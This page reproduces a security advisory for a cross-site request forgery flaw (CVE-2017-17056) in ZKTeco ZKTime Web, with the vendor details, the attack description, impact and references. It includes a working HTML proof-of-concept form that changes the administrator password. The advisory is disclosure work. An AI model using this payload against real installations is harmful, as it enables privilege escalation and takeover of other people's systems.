Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHimanshu MehtaPACKETSTORM:145160
HistoryNov 30, 2017 - 12:00 a.m.

ZKTeco ZKTime Web 2.0.1.12280 Cross Site Request Forgery

2017-11-3000:00:00
Himanshu Mehta
packetstormsecurity.com
52

0.002 Low

EPSS

Percentile

60.0%

JSON
`*1. Introduction*  
  
Vendor: ZKTeco  
Affected Product: ZKTime Web - 2.0.1.12280  
Fixed in:  
Vendor Website: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html  
Vulnerability Type: Cross Site Request Forgery  
Remote Exploitable: Yes  
CVE: CVE-2017-17056  
  
*2. Product description*  
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software,  
which provided a stable communication for devices through GPRS/WAN,  
hence, users can access the software anywhere by their Web Browser to  
remotely manage hundreds of T&A terminals under complex network  
condition (WLAN). The Application has an administrator role and  
application user role.  
  
*3. Attack Description*  
The ZKTime Web Software allows the Administrator to elevate the  
privileges of the application user using a 'password_change()'  
function of the Modify Password component.  
  
An Attacker takes advantage of this scenario and creates a crafted  
link to add himself as an administrator to the ZKTime Web Software. He  
then uses social engineering methods to trick the administrator into  
click the forged http request. The request is executed and the  
attacker becomes the Administrator of the ZKTime Web Software.  
  
*4. Proof of Concept Code*  
Forged HTTP Request used by the attacker:  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://110.80.38.74:8060/accounts/password_change/?stamp=1511716959229"  
method="POST">  
<input type="hidden" name="old_password" value="xmzkteco888" />  
<input type="hidden" name="new_password1" value="admin" />  
<input type="hidden" name="new_password2" value="admin" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
*5. Impact*  
If the vulnerability is successfully exploited than an attacker (who  
would be a normal user of the web application) can escalate his  
privileges and become the administrator of ZK Time Web Software.  
  
*6. References*  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17056  
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=>  
  
*7. Credit*  
Himanshu Mehta (@LionHeartRoxx)  
`

Related

cve 1
prion 1
cvelist 1
zdt 1
nvd 1
openvas 1
cve
cve
CVE-2017-17056
2017-12-04 14:29:00
prion
prion
Design/Logic Flaw
2017-12-04 14:29:00
cvelist
cvelist
CVE-2017-17056
2017-12-04 14:00:00
zdt
zdt
ZKTeco ZKTime Web 2.0.1.12280 Cross Site Request Forgery Vulnerability
2017-12-01 00:00:00
nvd
nvd
CVE-2017-17056
2017-12-04 14:29:00
openvas
openvas
ZKTeco ZKTime Web Multiple Vulnerabilities
2017-12-05 00:00:00

0.002 Low

EPSS

Percentile

60.0%

JSON
Related for PACKETSTORM:145160
cve1prion1cvelist1zdt1nvd1openvas1